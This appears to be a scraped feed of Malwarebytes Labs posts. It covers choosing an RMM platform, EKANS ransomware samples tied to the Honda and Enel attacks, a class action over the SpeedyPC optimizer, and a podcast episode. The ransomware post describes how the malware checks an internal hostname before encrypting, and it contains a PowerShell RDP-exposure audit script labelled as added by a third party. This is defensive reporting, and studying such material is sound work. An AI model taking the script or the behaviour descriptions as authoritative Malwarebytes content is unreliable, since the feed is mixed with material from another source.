Of course, no matter how intuitive the platform claims to be, it’s still new software that no one in the company is familiar with. That said, a good RMM must offer training for MSP technicians to fully understand the platform and use it well and proficiently. Know that the more complex the tool, the longer the training; the longer the training, the greater the cost; and the more complex the tool, the higher the risk that the trained technician will make mistakes.


Ask: “Can the RMM platform be accessed via mobile devices?”

With everyone carrying at least one mobile device with them, going mobile is no longer just a want but, for many, a need. An RMM solution that MSP technicians can use outside of the office can be an extremely valuable feature, especially when a real-time alert kicks in. The MSP technician must be able to perform troubleshooting tasks using a small screen and over a cellular network. An MSP that can deliver quality service anytime and anywhere is something that current and potential clients look for and may become highly in demand in the future.

For MSPs, security is at the forefront in these uncertain times

Choosing a vital tool like an RMM platform is not an easy or quick process for MSPs to go through. It takes careful thinking and a lot of time and effort in evaluating. For new MSPs, this process is probably one of the most challenging, more so if all RMMs seemingly offer the same things. At the end of the day, however, finding that one RMM vendor you can grow your business and expand your portfolio offerings with is totally worth it. Potential and current clients not only see MSPs as software and hardware experts, but they are quickly looking up to them as security advisers as well.

Having insight on the current trends and following these considerations, coupled with asking the right questions, is not only strategic. It is also the first step in laying down the cornerstone for future-proofing your business.

Good luck in your search!

The post MSPs, know what you’re really looking for in an RMM platform appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Honda and Enel impacted by cyber attack suspected to be ransomware

Malware Bytes Security - Tue, 06/09/2020 - 11:53pm

Car manufacturer Honda has been hit by a cyber attack, according to a report published by the BBC, and later confirmed by the company in a tweet. Another similar attack, also disclosed on Twitter, hit Edesur S.A., one of the companies belonging to Enel Argentina which operates in the business of energy distribution in the City of Buenos Aires.

Based on samples posted online, these incidents may be tied to the EKANS/SNAKE ransomware family. In this blog post, we review what is known about this ransomware strain and what we have been able to analyze so far.

Targeted ransomware with a liking for ICS

First public mentions of EKANS ransomware date back to January 2020, with security researcher Vitali Kremez sharing information about a new targeted ransomware written in Golang.

The group appears to have a special interest in Industrial Control Systems (ICS), as detailed in this blog post by security firm Dragos.

Figure 1: EKANS ransom note

On June 8, a researcher shared samples of ransomware that supposedly was aimed at Honda and ENEL INT. When we started looking at the code, we found several artefacts that corroborate this possibility.

Figure 2: Mutex check

When the malware executes, it will try to resolve a hardcoded hostname. If, and only if, it does, will the file encryption begin. The same logic, with its own hardcoded hostname, also applies to the ransomware allegedly tied to Enel.

Figure 3: Function responsible for performing DNS query

Target: Honda

  • Resolving internal domain:
  • Ransom e-mail: CarrolBidell@tutanota[.]com

Target: Enel

  • Resolving internal domain:
  • Ransom e-mail: CarrolBidell@tutanota[.]com

RDP as a possible attack vector

Both companies had some machines with Remote Desktop Protocol (RDP) access publicly exposed (reference here). RDP attacks are one of the main entry points when it comes to targeted ransomware operations.

  • RDP Exposed: /
  • RDP Exposed: /

However, we cannot say conclusively that this is how threat actors may have gotten in. Ultimately, only a proper internal investigation will be able to determine exactly how the attackers were able to compromise the affected networks.


We tested the ransomware samples publicly available in our lab by creating a fake internal server that would respond to the DNS query made by the malware code with the same IP address it expected. We then ran the sample alleged to be tied to Honda against Malwarebytes Nebula, our cloud-based endpoint protection for businesses.

Figure 4: Malwarebytes Nebula dashboard showing detections

We detect this payload as ‘Ransom.Ekans’ when it attempts to execute. In order to test another of our protection layers, we also disabled (not recommended) the malware protection to let the behavior engine do its thing. Our anti-ransomware technology was able to quarantine the malicious file without the use of any signature.

Ransomware gangs have shown no mercy, even in this period of dealing with a pandemic. They continue to target big companies in order to extort large sums of money.

RDP has been called out as one of the lowest-hanging fruits preferred by attackers. However, we also recently learned about a new SMB vulnerability allowing remote code execution. It is important for defenders to properly map out all assets, patch them, and never allow them to be publicly exposed.
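The exposure described in this post is something a defender can check host by host before an asset inventory is complete. The PowerShell below is an added example, not code from the Malwarebytes post: it reads the documented Terminal Server registry values to see whether RDP is enabled and whether Network Level Authentication is required, checks for a listener on TCP 3389, and lists the enabled inbound Remote Desktop firewall rules with the remote address scope each one allows. It assumes the English display group name “Remote Desktop” for the built-in rules, and it reads settings only.

```powershell
# Added example (not from the Malwarebytes post): report a Windows host's RDP exposure posture.
# Registry locations are the documented Terminal Server settings; the firewall display
# group name 'Remote Desktop' is the English name of the built-in rules (assumption).
function Get-RdpExposureReport {
    [CmdletBinding()]
    param()

    $tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdpTcp = Join-Path $tsKey 'WinStations\RDP-Tcp'

    # fDenyTSConnections = 1 means Remote Desktop connections are refused.
    $deny = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    $rdpEnabled = ($deny -eq 0)

    # UserAuthentication = 1 means NLA is required before a session (and logon screen) is created.
    $nla = (Get-ItemProperty -Path $rdpTcp -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication
    $nlaRequired = ($nla -eq 1)

    # Is anything actually listening on the default RDP port?
    $listeners = @(Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue)
    $listening = $listeners.Count -gt 0

    # Enabled inbound allow rules in the Remote Desktop group, with the remote scope each permits.
    $rules = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound `
                -Enabled True -Action Allow -ErrorAction SilentlyContinue)
    $scopes = foreach ($r in $rules) {
        $addr = $r | Get-NetFirewallAddressFilter
        [pscustomobject]@{
            Rule          = $r.DisplayName
            Profile       = [string]$r.Profile
            RemoteAddress = ($addr.RemoteAddress -join ',')
        }
    }

    # A remote scope of 'Any' on an enabled allow rule is what turns a public interface
    # or a port forward into the kind of exposure the article describes.
    $openToAny = @($scopes | Where-Object { $_.RemoteAddress -eq 'Any' }).Count -gt 0

    $finding =
        if (-not $rdpEnabled -and -not $listening) { 'RDP disabled and not listening' }
        elseif (-not $nlaRequired -and $openToAny) { 'RDP reachable from any address without NLA: restrict scope and require NLA' }
        elseif ($openToAny)                         { 'RDP reachable from any address: restrict RemoteAddress or place behind VPN' }
        else                                        { 'RDP enabled with a restricted firewall scope' }

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        RdpEnabled         = $rdpEnabled
        NlaRequired        = $nlaRequired
        ListeningOn3389    = $listening
        EnabledAllowRules  = @($scopes)
        AllowRuleOpenToAny = $openToAny
        Finding            = $finding
    }
}

$report = Get-RdpExposureReport
$report | Format-List ComputerName, RdpEnabled, NlaRequired, ListeningOn3389, AllowRuleOpenToAny, Finding
$report.EnabledAllowRules | Format-Table Rule, Profile, RemoteAddress -AutoSize
```

Run it from an elevated prompt so the firewall cmdlets return complete results. A host whose report says RDP is reachable from any address still needs the external view (is that interface or a NAT rule actually routable from the Internet?), which is exactly the asset-mapping step the post asks defenders to do; this script tells you which hosts to prioritize for that check.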

We will update this blog post if we come across new relevant information.

Indicators of Compromise (IOCs)

Honda related sample:


Enel related sample:


The post Honda and Enel impacted by cyber attack suspected to be ransomware appeared first on Malwarebytes Labs.

Categories: Malware Bytes

ParetoLogic facing complaint of alleged wrongdoing

Malware Bytes Security - Tue, 06/09/2020 - 11:00am

A short while ago we reported on the FTC ruling against payment provider RevenueWire. Now, another Canadian company is under scrutiny, and the cases are very much related. Not only are these companies hailing from the same city, they also share some founders.

The company ParetoLogic is involved in a US class action lawsuit in which it is accused of having circulated programs that would charge customers to fix non-existent computer problems.

As we saw in our previous coverage, RevenueWire—acting under the name SafeCart—was charged under the accusation that they provided services as a payment provider for companies that were involved in tech support scams. RevenueWire denies the allegations, and issued a statement saying it settled to avoid protracted litigation and legal costs.

The case of ParetoLogic

In the case at hand, the plaintiff Archie Beaton sued Defendant SpeedyPC Software (“SpeedyPC”), a British Columbia company, alleging that it was engaged in fraudulent and deceptive marketing of SpeedyPC Pro (“Speedy PC Pro” or the “Software”), a computer software product that claimed to be able to diagnose and repair various PC errors.

In this context it is good to know that SpeedyPC Pro is the name of a program that the plaintiff purchased, and this program was produced, marketed, and sold by ParetoLogic.

The United States District Court for the Northern District of Illinois Eastern Division set out under the notice that “SpeedyPC Software appears to be the trade name of a company known as ParetoLogic, Inc. To avoid confusion, the Court will refer to the defendant only as SpeedyPC Software.”

ParetoLogic software

SpeedyPC was not the only software issued by ParetoLogic. Many similar programs were marketed in very much the same way. What they all had in common is that they fall in a category we refer to as “system optimizers.” This type of software combines some or all of the below functionalities:

  • Registry cleaner
  • Driver updater
  • Temp file cleaner
  • Disk optimizer (disk defragmenter)
  • System error reporter

Since all these functionalities are offered by free tools built into the Windows operating system, many system optimizers are considered Potentially Unwanted Programs (PUPs), especially if they exaggerate the seriousness of possible improvements that can be made on a user’s system.

A well-known example of a ParetoLogic product is PC Health Advisor:

The ties with RevenueWire

What’s interesting in this case is that ParetoLogic Inc. was co-founded by the same partners behind another Victoria, Canada tech company, RevenueWire, that recently settled fraud charges with the U.S. Federal Trade Commission for US$6.7 million.

RevenueWire handled the sales and distribution of software and digital products for many developers and publishers worldwide. In fact, part of RevenueWire’s alleged scheme involved serving as a legitimate face for software companies that had already been denied by large, trusted payment processors, and according to at least one online forum, ParetoLogic may have fit that description, as it did not appear to accept PayPal.

The case against ParetoLogic

ParetoLogic has been fighting the plaintiffs’ right to start a class-action case in the US on several grounds since 2015 but was unsuccessful in this attempt to avoid going to court over the charges. Archie Beaton’s motion to certify a class for his complaint—which basically serves as a request to gather other folks facing similar, alleged wrongdoing into one lawsuit—against ParetoLogic was granted in October 2017 and was upheld at the U.S. Court of Appeals for the Seventh Circuit in Chicago in October 2018.

Grounds for the case

Beaton looked online for a fix for some computer problems he was experiencing and found a free trial of SpeedyPC Pro. As per usual with this type of software the program reported some problems with the system, but let the user know they needed the paid version to fix said problems.

From the Court of Appeals for the Seventh Circuit:

Using his personal business’s credit card, [Beaton] purchased SpeedyPC Pro and ran it on his laptop. It began by scanning his device, just as the free trial had done. The program then told Beaton to click on “Fix All.” Beaton dutifully did so. Yet nothing happened. Beaton ran the software a few more times, to no avail. Feeling ripped off, and suspecting that his experience was not unique, Beaton sued Speedy in 2013 on behalf of a class of consumers defined as “All individuals and entities in the United States who have purchased SpeedyPC Pro.” Despite Speedy’s lofty pledges, Beaton claimed, the software failed to perform as advertised. Instead, it indiscriminately and misleadingly warned all users that their devices were in critical condition, scared them into buying SpeedyPC Pro, and then ran a functionally worthless “fix.”

Decision of the court

Speedy identified 10 individual issues that allegedly defeated predominance. The district court was not persuaded. It found that some were best addressed on a class-wide basis, and they outweighed the remaining individualized inquiries.

“Finding no abuse of discretion in the district court’s decisions to certify the nationwide class and the Illinois subclass, we affirm the court’s certification orders,” the court wrote.

In layman’s terms, this means the plaintiff can represent other victims of ParetoLogic’s SpeedyPC and seek compensation for their damages.


This case has been on the table since 2014 and it can take a few more years before the courts decide on a final ruling about compensation. Meanwhile, ParetoLogic’s Victoria offices have been closed and its website has been taken offline. Provincial government records show it is still registered as an active corporation and its last annual report was filed in January.

The post ParetoLogic facing complaint of alleged wrongdoing appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep8: Securely working from home (WFH) with John Donovan and Adam Kujawa

Malware Bytes Security - Mon, 06/08/2020 - 11:31am

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to John Donovan, head of security at Malwarebytes, and Adam Kujawa, director of Malwarebytes Labs, about securely working from home (WFH).

With shelter-in-place orders now in full effect to prevent the spread of coronavirus, countless businesses find themselves this year in mandatory work-from-home situations. On today’s episode, we go beyond just talking about threats. We have a dialogue.

First, what types of malware and attack methods are we seeing, and then, how has Malwarebytes responded. We want to give you an inside look, because even though we’re a cybersecurity company, staying cyber secure goes beyond malware detection. It reaches into educating your employees and implementing proper policies to protect your company.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on:

Plus other cybersecurity news:
  • Bug bounty hunter snags $100,000 award for zero-day bug in ‘Sign in with Apple’ system. (Source: TechSpot)
  • 100,000 company inboxes hit with voice message phishing. (Source: Bleeping Computer)
  • 80% of organizations suffered at least one cloud data breach in the past 18 months. (Source: Ciso Mag)
  • Mongolia arrests 800 Chinese citizens in cybercrime probe. (Source: Reuters)
  • Minnesota used contact tracing to track protestors, which created a trust problem for medical workers in the pandemic. (Sources: BGR and Cnet)

Stay safe, everyone!

The post Lock and Code S1Ep8: Securely working from home (WFH) with John Donovan and Adam Kujawa appeared first on Malwarebytes Labs.

Categories: Malware Bytes